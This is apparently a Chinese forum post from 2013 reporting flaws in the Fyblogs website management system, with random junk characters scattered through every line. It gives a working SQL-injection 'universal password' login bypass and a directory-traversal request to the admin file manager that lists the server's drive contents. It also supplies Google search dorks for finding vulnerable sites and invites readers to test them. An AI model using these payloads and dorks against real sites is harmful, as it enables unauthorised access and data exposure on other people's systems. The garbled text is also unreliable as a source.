漏洞类型: 未授权访问/权限绕过9 R& S' h; g( ^ m+ \8 s
% c- o. v8 z# N8 h W简要描述:( [/ h' {# j+ S- Q7 K5 p
' T$ M c" ]% A2 y w; kFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!) Z+ D3 o" s" u) ]
+ y* B6 y- O, B+ _& a; z& U! I详细说明:
; L) r5 f1 [" m4 z% l) f3 s7 { r: q* m& B2 h4 n) f
后台万能密码 'or'='or'- K4 Y6 k; k. V9 n! m. T' E! Q5 M
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
. R( ^: a f+ |4 o) p6 z: tadmin/uploadfile.asp?currentFolder=/upfiles/../1 g- Q( g* l9 _0 P
3 j7 d o3 c; G3 Z+ l
漏洞证明:
2 l1 @) _7 M2 s; b& _+ ~
( S' _8 y3 s" k, q, ]5 i谷歌:inurl:type.asp?id=1 新闻中心$ r4 C- o. \; x* A* K& e
或者 :inurl:download_ok.asp?
' ?, I# [2 D+ M/ P( ?! d0 ?4 J$ k; K
可以测试' X' F% V1 s* T8 X3 `; h
" J+ x8 D! k) a T- d9 K
# Z1 l- H" e# p& f5 ]/ x |
发表于 2013-3-7 13:07:46
收藏
支持
反对